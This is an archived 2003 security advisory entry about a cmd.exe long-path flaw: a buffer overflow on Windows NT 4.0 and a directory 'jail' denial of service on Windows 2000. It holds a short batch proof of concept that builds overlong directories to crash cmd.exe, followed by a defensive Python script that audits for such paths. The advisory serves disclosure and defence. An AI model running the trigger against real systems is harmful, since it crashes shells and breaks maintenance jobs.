11th Feb 2003 [SBWID-5980]
COMMAND
	Windows cmd.exe long path buffer overflow/DoS
SYSTEMS AFFECTED
	 Microsoft Windows NT 4.0 (buffer overflow)
	 Microsoft Windows 2000 (DoS)
PROBLEM
	In 3APA3A [[email protected]] advisory:
	
	http://www.security.nnov.ru
	         /\_/\
	        { , . }     |\
	+--oQQo->{ ^ }<-----+ \
	|  ZARAZA  U  3APA3A   }
	+-------------o66o--+ /
	                    |/
	
	--snip--
	The NTFS file system allows creating paths of almost unlimited length. But the
	Windows API does not allow a path longer than 256 bytes. To prevent the
	Windows API from checking the requested path, the \\?\ prefix may be used
	for the filename. This is a documented feature of the Windows API.
	cmd.exe from Windows NT 4.0 has a trivial buffer overflow in the CD command
	if the destination path is longer than 256 characters. This vulnerability may
	be trivially exploited to execute code.
	cmd.exe from Windows 2000 has no buffer overflow, but after changing to a
	directory with a path slightly longer than 256 characters (for example
	260 characters) cmd.exe becomes "jailed" in this directory; that is, the cd
	.. command will fail. It may cause a DoS against maintenance batch
	scripts.
	 Exploitation
	 ============
	
	@echo off
	REM %A% and %B% are overlong directory names; the \\?\ prefix makes the
	REM Win32 API skip its path-length check so mkdir can create the tree
	SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
	mkdir \\?\c:\%A%
	mkdir \\?\c:\%A%\%A%
	mkdir \\?\c:\%A%\%B%\
	c:
	cd \
	cd AAAAAAAAAAAA*
	cd AAAAAAAAAAAA*
	cd BBBBBBBBBBBB*
	cd ..
	
	creates a directory with 2 subdirectories. The first one demonstrates the buffer
	overflow on Windows NT 4.0 (the second cd AAAAAAAAA* command will crash
	cmd.exe with EIP overwritten); the second one demonstrates cmd.exe changing
	directory to AA...\BB..., but the cd .. command will fail.
	--snap--
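	An audit script a maintenance operator can run before a scheduled batch job, added here as an example and not part of the 3APA3A advisory: it walks a tree and reports every entry whose path exceeds the Win32 limit, using the same \\?\ prefix the advisory relies on so the listing itself is not refused. It assumes Python 3 and uses the Win32 MAX_PATH constant of 260 (the advisory quotes 256); the A/B directory names and the temporary demo tree are constructed for the example.

```python
"""Audit a directory tree for paths that exceed the Win32 path limit."""
import os
import tempfile

# Win32 MAX_PATH is 260 (the advisory quotes 256).  The \\?\ prefix tells
# the API to skip that check, which is how the overlong directories in the
# advisory are created; an audit must use the same prefix to see them.
MAX_PATH = 260
EXTENDED_PREFIX = "\\\\?\\"
A_NAME = "A" * 200   # constructed, stands in for the advisory's %A%
B_NAME = "B" * 52    # constructed, stands in for the advisory's %B%


def _extended(path):
    """Add the \\?\ prefix on Windows so the API does not reject long paths."""
    if os.name == "nt" and not path.startswith(EXTENDED_PREFIX):
        return EXTENDED_PREFIX + path
    return path


def win32_length(path):
    """Path length as the Win32 API counts it, ignoring the \\?\ prefix."""
    if path.startswith(EXTENDED_PREFIX):
        path = path[len(EXTENDED_PREFIX):]
    return len(path)


def find_overlong_paths(root, limit=MAX_PATH):
    """Return every entry under root whose full path exceeds limit.

    These are the directories a scheduled batch job cannot 'cd ..' out of
    (Windows 2000) or crashes in (NT 4.0), so inspect them before it runs.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(_extended(root)):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if win32_length(full) > limit:
                hits.append(full)
    return sorted(hits)


def build_demo_tree():
    """Create a throwaway tree with the advisory's A\\A and A\\B layout."""
    base = tempfile.mkdtemp(prefix="longpath-")
    os.makedirs(_extended(os.path.join(base, A_NAME, A_NAME)))
    os.makedirs(_extended(os.path.join(base, A_NAME, B_NAME)))
    return base
```

	Run `find_overlong_paths` against a real volume root (for example `C:\`) to list what a batch script could get jailed in; the demo tree only exists to show the function firing.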
SOLUTION
	None yet